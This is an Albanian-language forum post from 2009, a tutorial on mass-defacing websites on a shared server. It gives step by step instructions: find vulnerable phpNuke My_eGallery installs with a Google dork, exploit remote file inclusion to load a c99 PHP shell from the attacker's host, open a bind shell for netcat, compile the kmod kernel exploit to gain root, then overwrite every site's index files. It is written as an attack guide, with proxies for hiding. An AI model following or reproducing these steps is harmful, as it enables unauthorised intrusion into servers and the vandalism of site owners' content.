MC RzA

Welcome/Mir Se Vini !
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Mass Deface 100% nga mix2mix :D

View previous topic View next topic Go down 
AuthorMessage
MC RzA
Admin


Posts : 181
Join date : 2009-10-27

PostSubject: Mass Deface 100% nga mix2mix :D   Tue Oct 27, 2009 10:55 am

MASS DEFACE do te thote "SHKATRRIM I PLOTE"
Me se pari mesoni me u bind per nje send: nuk eshte sikur ne film qe vjen njari shkruan
dicka edhe hyn ne NASA, ose ben me eksplodua PC-en ky eshte realitet virual.
Thene keta, ne kete mesim (Tutorial) do tju tregoj ne menyren me te leht dhe me te
shkurter si me ba nje Mass Deface ne nje Server, mbajeni mend se nuk mund te bahet gjithmon
por vetem ne serverat vulnerability gje do te flas me vone...

----------------------------------------------------------------------------------------------

1 - Cka duhet te dini?

Duhet ta njohni bazen e Linux-it
Komandat per Shell Linux
Ta njohur bazen e PHP-es
Ta njohur bazen e HTML-it
Si me kompilua nje C program per Linux

Nese nuk dini nje nga keto perdorni nje motor kerkimi si GOOGLE she gjeni shum tutorial te nevojshem

-----------------------------------------

2 - Cka duhet me pase?

Duhet me e pas PC te konektuam ne Internet lol
Nje list te mire proxy-sh
Dhe shum kohe me humb mbas PC-jet

-----------------------------------------

3 - Ja fillojme...

Teknika qe do tju tregoj permbahet ne 4 pika
1: Te gjeni nje web vulnerabily
2: Burica ( BUG )
3: Me fitua accessin ne ROOT
4: Me fshi, modifikua, gjitha index (html, php) dhe kejt filet qe jane ne ate server

-----------------------------------------

3 - Remote File Inclusion e phpNuke:

Ka shume lloje te vulnerability, ajo qe na duhet neve eshte Remote File Inclusion.
Qe eshte? Thiesht aj mundeson me egzekutua nga nje server nje PHP script te hostuar nga serveri tjeter.
Si nje shembull do te marrim nje buric (BUG) ne My_eGallery te phpNuke-s. Per me gjet webat vurnelabily
mund te na ndihmoj shoku yne Google Beni nje kerrkim te thjesht me "allinurl:my_eGallery" kete fjale.

-----------------------------------------

4 - Burica (BUG)

Buricen qe do ta perdorim eshte qysh verzionit 3.1.1 te My_eGallery e me poshte.
http://www.viktima.com/modules/My_eG....com/shell.jpg
Cfare do te thote kjo? Me nisjen e nje URL-i keshtu nga webbrowseri juaj ben te egzekutosh shell.jpg
qe eshte nje nje host tjeter ( http://webijuaj.com ). Ne qofte se ne do e vendosim shell.php ateher do ta egzekutoj
sikur te ishte ne host te tij, keshtu qe vendosim shell.jpg apo txt qe te egzekutoj sikur ishte ne hostin e viktimes.

-----------------------------------------

5 - Shelli ne PHP

Cka eshte nje Shell (shpresoj se e dini), gjeja e bukur eshte se mundesh me krijua nje PH script dhe mund ta kontrollosh nga REMOTE
permes browserit tone ( IE Suck! Firefox Rulez www.getfirefox.com ) ka shume opcione dhe nje nga ato edhe "Mass Deface"

-----------------------------------------

6 - Ja fillojme seriozisht

Supozojm se e keni gjetur viktimen te cilen doni me sulmua... dhe aj e ka te instaluar
my_eGallery ( nepermjet te ciles kemi me perore Remote File IInclusion)
dhe shelli juaj te jet ne www.webijuaj.com/shell.jpg -- (kuptohet aty ku shkrua webijuaj.com e vendosni webin tuaj)
Me browserin ton mire te mbrojtur me proxy shkojm ne kete URL (adres)
http://www.viktima.com/modules/My_eG....com/shell.jpg
(edhe ketu kuptohet se viktima dhe webijuaj ndyshohet)
Nese fitoni nje mesazh si "Were you trying to hack our site or server ??? Go Away Bastard" ose dicka te ngjejshem
nuk mund te beni kurr gja! Nese te kunderten shiqojm nje shkrima "! c99 Shell !" apo dicka ashtu ateher mund te jemi pak te gezuam
Ne pjesen e lart te Shell-it jane informacionet e serverit si OS , IP , verzioni i webserverit e tjeter...


Kodi:
----------------------------------------------------------------------------------
Software: Apache/1.3.6 (Unix) (SuSe/Linux) PHP/4.3.1
uname -a: Linux sito.host.it 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure)
Directory: /www/webi.com/ rwxrwxrwx
Free 2.83 GB of 13.27 GB (21.3%)
----------------------------------------------------------------------------------Keto informacione ne Linux fitohen me komanden "uname -a" ,
Nese shihni se sjemni ne nje Server Linux ateher lejeni kete pune.
Ne mes te ketyre infove do te shihni edhe verzionin e KERNEL, "zemra" e linuxit, qe per fat tonin eshte plot me burica (BUG's)
Prej pseudonimit (userit) te tanishem (nobody), pa privilegje me u be root ose me mire me u be Zoti i Sistemit.
Tani do te marrim nje gjiro ne Server...
Vazhdoni te shfletoni direktoriumet, dhe se gjithcka shkon sipas planeve do te arrini ne direktoriumin (folderin) /www/
dhe ne te nga nje nen folder dhe secila me emer te nga nje web sajti.
Per te evituar se ne nje menyr kaq te leht te Hackohen te gjith klientat e ospituar (hostuar) dhe te pas kontrollin
e komplet te serverit, egzistojn pseudonime (usera) te ndryshem, dhe secili privilegjet apo mundesit e tije.
Ne tani jemi "nobody" (mund te kontrolloni me komanden "whoami") dhe kemi access vetem ne kartelat me chmod 777
ose me mire ato te shkruashme nga shithkush, ne fakt eshte menyr per te uploduar foto ose file ne server.
Kerrkojme nje kartel ne te cilen kemi FULL ACCESS access te plote, ne c99 jane evidenca ne gjelbert.

7 - Root

Si tja bejme te behemi root?
Shfrytezojm (exploit-ojme) Kernel-in ("zemeren e linux-it)
Exploiti i cili na duhet eshte aj i "kmod", mund te gjehet shum leht nga google, e shkarkojm, ateher e uplodojm ne server nepermes c99
dhe e kompilojme, gcc kmod.c - kmod ....
E chmod-ojme ne 777 per me mujt me e egzekutua dhe ne jemi ne rregull
Tash perdorim funcionin "bind" te c99-tes, qe na krijon nje shell ne server qe na mundeson me hy me Netcat ose Telnet.
e vendosim ne portin te cilin ne deshirojme, dhe e bejm bind, nese serveri seshte i mbrojtur nga firewall ateher do te jet ne rregull,
Nese ka firewall do tju tregojme me vone se si me ja be>!?
Tani te konektohemi ne shellin tone dhe te bejm nje "id" si pergjigjie do te duhet te fitomi keshtu:


Kodi:
--------------------------------------------------------
uid=99(nobody) gid=99(nobody) groups=99(nobody)
--------------------------------------------------------qe na tregon utilitetin e userit tone,
tani egzekutojm exploitin me ./kmod , e bejme perseri "id" dhe nese gjithcka shkon si duhet:


Kodi:
----------------------------------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
----------------------------------------------------------------------------------------Ehhhhh tani mundemi gjithcka... CONGATULATION )
Back to top Go down
View user profile http://mc-rza.forumotion.com
 
Mass Deface 100% nga mix2mix :D
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Mass Order Canta Strap & Bag
» King Earthquake: Midnight Mass, Jam Radio. Every monday

Permissions in this forum:You cannot reply to topics in this forum
MC RzA :: Mësime/Tutorials-
Jump to: